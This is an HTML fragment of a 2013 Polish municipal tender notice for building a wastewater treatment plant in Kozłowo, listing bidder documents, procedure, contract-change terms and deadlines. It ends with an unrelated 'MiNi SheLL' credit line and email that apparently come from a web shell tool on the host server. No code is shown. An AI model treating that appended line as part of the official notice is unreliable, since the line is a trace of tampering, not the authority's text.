<ul class="kh_indent_1"><li><p>c)	Zamawiający celem potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia żąda załączenia do oferty następujących dokumentów:
           - opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że              wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie           prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min.           2.000.000,00 zł.
-  informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę min. 2 000 000 złotych wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>PEŁEN WYKAZ DOKUMENTÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO ZAWARTY JEST W SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa   w   sprawie   realizacji   zamówienia   publicznego   zawarta   zostanie   z    uwzględnieniem postanowień wynikających z treści niniejszej SIWZ oraz danych zawartych   w ofercie. Zamawiający podpisze umowę z Wykonawcą, który przedłoży najkorzystniejszą   ofertę. Zamawiający zastrzega sobie prawo zmian nieistotnych treści umowy oraz zmian  dotyczących;
 1.   Zmiana terminu realizacji przedmiotu umowy

1.1	      zmiany spowodowane warunkami atmosferycznymi, w szczególności:
1.1.1     warunki    atmosferyczne    uniemożliwiające    prowadzenie    robót    budowlanych                zgodnie  z wymaganiami, przeprowadzanie  prób  i  sprawdzeń,            dokonywanie odbiorów;
1.1.2    klęski żywiołowe;

1.2    	zmiany    spowodowane    warunkami    geologicznymi,    terenowymi,           archeologicznymi, wodnymi itp. w szczególności:

1.2.1	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał, itp.);
1.2.2	odmienne od przyjętych w dokumentacji projektowej warunki terenowe w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
1.2.3	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
1.2.4	wykopaliska archeologiczne, szkody górnicze, nie przewidywane w SIWZ ;
1.3	zmiany    będące    następstwem    okoliczności    leżących    po    stronie               Zamawiającego, w szczególności:
1.3.1	wstrzymanie realizacji umowy przez Zamawiającego;
1.3.2	konieczność   usunięcia   błędów   lub   wprowadzenia   zmian   w   dokumentacji   projektowej lub dokumentacji technicznej urządzeń;
  1.4      zmiany będące następstwem działania organów administracji, w szczególności:

1.4.1	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
1.4.2	wydanie postanowienia o wstrzymaniu robót budowlanych, w przypadku o którym mowa w art. 50 ust. l ustawy Prawo budowlane
1.4.3	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego -konieczności nie przewidywano przy zawieraniu umowy
1.4.4	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy

    1.5	 inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy                skutkujące niemożliwością prowadzenia działań w celu wykonania umowy
           W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1 -       1.5  termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas        niezbędny do zakończenia  wykonywania jej przedmiotu w sposób należyty.

   2.  Pozostałe zmiany
2.1    Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
2.2 Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu
2.3 Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
2.4   Wstrzymanie realizacji zamówienia przez właściwe służby i organy na skutek następstw nieszczęśliwych  wypadków przy pracy
   3.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:

           3.1 ograniczenie przedmiotu świadczenia, jeśli taką możliwość przewidywała umowa
	    zmiana danych związanych z obsługą administracyjno - organizacyjną umowy       
	    np. zmiana nr rachunku bankowego
3.2 zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między             Stronami; 
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kozłowie
13-124 Kozłowo
Kozłowo 60A
woj. warmińsko - mazurskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2013 godzina 10:00, miejsce: Urząd Gminy w Kozłowie
13-124 Kozłowo
Kozłowo 60A
woj. warmińsko - mazurskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie pn. Budowa oczyszczalni ścieków w miejscowości Kozłowo jest współfinansowany ze środków Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com